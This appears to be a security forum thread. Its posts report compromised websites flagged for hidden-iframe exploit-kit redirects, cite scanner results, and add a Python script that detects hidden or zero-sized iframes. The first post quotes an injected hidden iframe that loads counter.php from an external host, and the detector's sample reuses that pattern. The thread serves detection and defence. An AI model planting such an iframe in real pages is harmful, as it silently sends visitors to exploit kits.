polonus
1
See: http://urlquery.net/report.php?id=8005236
The IDS alert → 1:27242 ↔ ENABLED ↔ EXPLOIT-KIT embedded iframe redirection - possible exploit kit indicator (exploit-kit.rules)
DrWeb flags this as infested: htxp://www.turismopractico.com.ar/cuadro-visitas.htm infected with JS.IFrame.425
See: https://www.virustotal.com/nl/url/9abae7a2e4957b9fd3a1a39997b4fe314c566d9e945eb17cfa5305e0d37bec83/analysis/1385482291/
and
https://www.virustotal.com/nl/file/b6873d2f068be9c2864e285ba55b36dbd6b166991e81b61af803454ebb1b6b05/analysis/1381144876/
and we see that avast detects this as HTML:Iframe-ZG [Trj]
iFrame check on site gives: Suspicious
<iframe src="htxp://baleine-blanche.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px"
Host for http://censorthis.urlquery.net/report.php?id=5876451
Also at Injection check: Suspicious Text after HTML
polonus
2
Same snort alert other site: http://urlquery.net/report.php?id=8135652
We are being advised not to go to this site: http://scanurl.net/?u=http%3A%2F%2Fmercantilexport.com%2F&uesb=Check+This+URL#results
blacklisted: http://maldb.com/mercantilexport.com/
Also infected with malware according to Sucuri's scanner: http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fmercantilexport.com%2F
and zulu.zscaler: http://zulu.zscaler.com/submission/show/0f07de41b3796c42dd339ebe39ec61cc-1386110900
When you are not being stopped by Google Safebrowsing from going to this site, avast detects it as HTML:Iframe-ZG [Trj]
There is also an old friend here doing the rounds: hxtp://mercantilexport.com/counter.php
Read about the malware connections of counter.php: http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php
(author of the above article: Vicente Diaz)
polonus
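The hidden-iframe indicator both posts above are about (an iframe with visibility:hidden and absolute positioning, pointing at a counter.php) can be checked for offline. The following is an added example; it is not the poster's code and not the logic of any of the linked scanners (urlquery, DrWeb, Sucuri, zulu.zscaler). It flags iframes whose style hides them, that are zero-sized, that are pushed off-screen, or whose src ends in counter.php. The sample HTML, the example.invalid host and the size/offset thresholds are constructed for illustration.

```python
"""Flag hidden or off-screen <iframe> tags of the kind discussed above.

Added example, not the forum poster's code or any scanner's logic.
Sample input, hostnames and thresholds are constructed assumptions.
"""
import re
from html.parser import HTMLParser

# Style fragments that hide an iframe from the visitor. The first one is
# exactly the style quoted in the first post; the others are common variants.
HIDDEN_STYLE_PATTERNS = [
    re.compile(r"visibility\s*:\s*hidden", re.I),
    re.compile(r"display\s*:\s*none", re.I),
    re.compile(r"(?:left|top)\s*:\s*-\d{3,}px", re.I),  # pushed far off-screen
]


def _is_tiny(value):
    """True for width/height attribute values such as '0', '1' or '1px'."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", str(value))
    return m is not None and int(m.group(1)) <= 1


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def classify_iframe(attrs):
    """Return the list of reasons an iframe looks like an injected redirect."""
    reasons = []
    style = attrs.get("style") or ""
    for pat in HIDDEN_STYLE_PATTERNS:
        if pat.search(style):
            reasons.append("style:" + pat.pattern)
    if _is_tiny(attrs.get("width")) and _is_tiny(attrs.get("height")):
        reasons.append("zero-size")
    src = (attrs.get("src") or "").lower()
    if src.endswith("counter.php"):  # the filename noted in both posts
        reasons.append("src:counter.php")
    return reasons


def scan_html(html):
    """Return [(src, reasons)] for every iframe that has at least one reason."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        reasons = classify_iframe(attrs)
        if reasons:
            findings.append((attrs.get("src") or "", reasons))
    return findings


# Constructed sample: one legitimate visible embed, one hidden injected
# iframe in the style quoted above, one zero-sized iframe. Hosts are fake.
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe src="https://example.invalid/video" width="560" height="315"></iframe>
<iframe src="hxxp://example.invalid/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px"></iframe>
<iframe src="hxxp://example.invalid/stat.php" width="0" height="0"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in scan_html(SAMPLE_HTML):
        print(src, "->", ", ".join(reasons))
```

The check is deliberately attribute-based: it does not fetch the iframe target, so it can run on a saved copy of the page without touching the exploit kit host. A hit is an indicator, not proof; follow it up with the urlquery/VirusTotal lookups shown in the posts.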
polonus
3